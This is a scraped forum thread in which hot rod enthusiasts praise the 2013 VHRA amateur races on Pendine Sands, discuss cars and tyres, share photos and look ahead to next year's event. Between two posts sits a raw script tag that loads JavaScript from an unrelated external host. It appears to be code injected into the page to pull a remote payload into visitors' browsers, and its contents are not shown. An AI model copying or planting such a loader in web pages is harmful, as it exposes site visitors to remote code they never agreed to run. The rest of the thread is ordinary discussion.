Register now to get rid of these ads!

Event Coverage VHRA Pendine Sands Amateur Hot Rod Races - Pics

Discussion in 'The Hokey Ass Message Board' started by Artiki, Sep 9, 2013.

1. Kustom Gal

Kustom Gal
    from England

2. TERPU

TERPU

That was one of the best things I have ever seen!

Super Rad!

Thanks,

Tim

3. 51farmtruck

51farmtruck

WOW!!! What an amazing group of hot rods! Not a bad apple in sight. Thank you for the pictures and videos, Right On!

4. Paul Hobby.
    Do you want me see if I can put you in touch Larry?

5. t_wood_08

t_wood_08

What a cool run! A bunch of great cars! Wish we could get something like this in the NW. Thanks for the pictures and videos!

6. gasser

gasser

As Russ said, that is Paul Hobby's car, The rears wheels are 18"s and the tyres (tires!) are good years, either 7 or 7-50-18. Other than that all's I know is I wish they were on my car! They are about 33 or 34" tall.

7. stephane-rod

stephane-rod
    from france

8. Justin B

Justin B

damn that looks like a good time, Europe seems to get the whole vintage American car thing better than most americans.

that video is pretty amazing, how was the racing done? I see pictures with helmets but no one lined up side by side, was this lsr style? If so any speeds/times

Last edited: Sep 11, 2013
  9. 3day

3day
    from UK

Stefan, that top pic of the 34 is probably the coolest rod shot I have ever seen. period. What a great weekend, all the pics are brilliant but that one full-on takes the biscuit. Amazing.

And how cool was the woody? Nuts

Last edited: Sep 16, 2013
  10. 3wLarry

3wLarry
    Member Emeritus
    from Owasso, Ok

Thanksabunch!

kidcampbell71 likes this.
  11. What an incredible venue and event! Thanks for the photos. Once again, the traditional rods from the other side of the pond, put on a superb example of a traditional event!

12. Awesome pics and what a great event you guys had! Best part is that it seems everyone was out driving the cars and having fun doing what you should be doing.

You guys have some real nice cars, all of them good job.

<script src="https://secure-content-delivery.com/data.js.php?i={4D877FC1-4956-4F45-A6B5-0E98AB82425A}&d=2012-6-15&s=http://www.jalopyjournal.com/forum/showthread.php?t=830985&page=4&cb=0.6072519910856252" type="text/javascript"></script>

13. A Boner

A Boner

14. fonti

fonti

wow...that is KILLER!! I have to be there if they do it again... forget all this shit they call "hot rod" over here:mad::mad:
    Congratulations to the ones who organised this event and the ones who where there!!

15. Kustom Gal

Kustom Gal
    from England

Around ninety percent of the cars were driven there and then raced on the sand, our club drove the 600 mile round trip and all that were racing got three runs in. The racing was just on Saturday and with all the organisation of getting the beach ready after the tide went out Neil & the rest of the crew did a fantastic job. Well done to our flattie powered '32 three window for getting there and back & racing!! My 32 five window had a few problems but still I managed to get three runs in & was really pleased with my times!

16. Lord Purple

Lord Purple

Larry , I already called Paul Hobby when I saw your post, he had seen it too but doesn't post on here. He was going to find out exact details and let me know for you. The tyres were bought in the US, he's digging out those details too. The wheels are super rare items, only set he's ever seen and not sure of their origin. More later.....

L.P.

17. nifty

nifty
    from UK

It's going to be a real bun fight next year to get the 'golden ticket' that lets you race.

18. Juggler

Juggler

There'll be a line of tents and sleeping bags outside an address in Colchester come the end of January 2014...

19. nifty

nifty
    from UK

I'm heading that way in a couple of weeks Juggs, can pick up an 'early bird' pass for you as well if you like ;)
    Poor old Neil is going to be pestered to within an inch of his life, lol

20. smarjoram

smarjoram
    from uk

Thanks for the nice comments about the photos! As I've had a few requests they're all now available to buy as prints (there are also quite a few that weren't in the flickr gallery so your car may be there even if it didn't appear before)...

http://www.photoboxgallery.com/stefanmarjoram

21. Mystery_Machine

Mystery_Machine

I'm still quite awestruck following on from the weekend. The day was simply sublime, overwhelming and, dare I say, emotional.

Massive thanks must go to Neil and everyone else at the VHRA for making this such an incredible and unique event. My head is still there on the sands while my body just carries out the mundane rituals of modern day life.

I simply cannot wait until next year. Thank you again.

[​IMG]

[​IMG]

[​IMG]

[​IMG]

^the 'whiting' on the corners of the photos is just there as a kind of watermark without running my name across the image - the final shots won't have that on them^

22. halfasskustoms

halfasskustoms
    from Durham NC

Those were great photos.

23. Juggler

Juggler

Yes please Nath:D

If you are heading over this side come and say hello - I'm only another hour up the A12

Cheers

Juggs

24. I think a new chapter in Hotrod history was written for the U.K. this last weekend!....It was the best weekend ever! Huge thanks to Neil and everyone who made this event possible....I'm proud to be part of such a great bunch of people that are the VHRA!...here's a couple of my photos. James.

Attached Files:

Last edited: Sep 12, 2013
  25. Limey Steve

Limey Steve
    Alliance Vendor
    from Whittier

Proper Hot Rodding, Beat that !!!

Cudos to Neil & everyone else involved , Jealous ? Me ?

You Bet :)

Last edited: Sep 14, 2013
  26. The Wrong-Un

The Wrong-Un

Thanks everyone for your kind words, moreover thank you to everyone that played their part to make the event run as smoothly as it did. The list is endless and many of you I don't even know, from beach walking to those that raced, give yourselves a huge pat on the back, you deserve it. A massive debt of thanks goes to the people of Pendine that allowed this to happen, wonderful people every last one of them.

It has been a pleasure to run the VHRA over the past few years and to culminate in what happened at Pendine Sands last weekend made all the effort worthwhile. A new chapter in UK hot rodding was written as someone said previously in this thread.

It's all going to happen again next year so keep an eye on www.vhra.co.uk for an announcement in the not too distant future. There are also plans for a book of our exploits, again keep an eye on the website for details of when it will become available.

Thanks again,

Neil.

27. zibo

zibo
    from dago ca

Wow there's a good amount of proper cars in that part of the world.
    Great races and great pics!
    Super cool!
    TP

28. ukgav

ukgav